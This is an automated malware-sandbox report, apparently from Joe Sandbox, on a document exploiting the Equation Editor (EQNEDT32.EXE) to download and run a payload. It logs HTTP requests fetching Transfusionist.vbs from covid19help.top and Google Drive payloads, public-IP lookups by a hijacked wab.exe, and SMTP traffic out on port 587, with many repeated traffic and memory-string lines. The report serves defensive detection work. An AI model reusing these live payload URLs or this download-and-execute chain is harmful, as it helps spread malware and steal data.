Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 108.177.122.132:443
Source: global traffic	TCP traffic: 108.177.122.132:443 -> 192.168.2.22:49168

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0062B84C

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 131.226.2.60:587

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.175.222 172.67.175.222
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

May check the online IP address of the machine

Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: api.ipify.org
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com
Source: C:\Program Files (x86)\Windows Mail\wab.exe	DNS query: name: ip-api.com

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 131.226.2.60:587

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Transfusionist.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.215.138:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0062B84C URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0062B84C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{27099B88-2DF0-47DA-B344-2C89EF146D55}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /Transfusionist.vbs HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1H8v0Z9q8BO4UTENkbTaiWpci8Y0jYRn3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Ir2jUNIAbfpPtpamNP91Yb3wOsJFyvQ-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: covid19help.top

Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005040000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005040000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.351510672.0000000000468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.351516195.000000000046C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wab.exe, 0000000F.00000002.560349981.0000000020B61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
Source: powershell.exe, 00000007.00000002.476890529.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: wab.exe, 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.myhydropowered.com
Source: powershell.exe, 00000007.00000002.481865683.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.348699576.0000000000668000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: wab.exe, 0000000F.00000002.560349981.0000000020BA4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B31000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.560349981.0000000020B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000007.00000002.476890529.0000000002446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.436497119.0000000002441000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.562554109.0000000020E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.348699576.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356229517.00000000003BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357333324.00000000003CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356388523.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.483917917.0000000005018000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.551527746.0000000004B46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
